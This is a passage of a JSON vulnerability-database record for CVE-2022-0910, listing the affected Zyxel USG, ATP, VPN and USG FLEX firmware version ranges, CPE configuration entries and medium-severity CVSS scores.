            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg 40",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg 60w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg 110",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "atp700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg 1900",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg 40w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "vpn300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "atp100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "atp500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg 20w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg20",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg 1100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg210",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg 1900",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg 310",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "atp100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "atp100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "atp200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg310",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg 2200-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg flex 100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg 40w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn1000",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg 40",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg 60w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg2200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg 1100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg flex 100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "vpn300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg flex 700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "atp200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn50",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.21"
          },
          {
            "model": "usg 110",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg flex 700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg210",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg flex 200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg 60",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.71"
          },
          {
            "model": "usg 310",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg flex 100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-0910"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn1000:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_110_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_110:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_1100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_1100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_1900_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_1900:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_20w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_20w-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_20w-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_2200-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_2200-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_310_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_310:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_40:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_40w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_40w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_60:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_60w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_60w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.21",
                        "versionStartIncluding": "4.50",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg20:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg210_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg210:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg2200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg2200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg310_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.71",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg310:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-0910"
          }
        ]
      },
      "cve": "CVE-2022-0910",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.0,
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 2.8,
                "impactScore": 3.6,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2022-0910",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "security@zyxel.com.tw",
                "id": "CVE-2022-0910",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202205-3996",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-0910"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-0910"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-3996"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
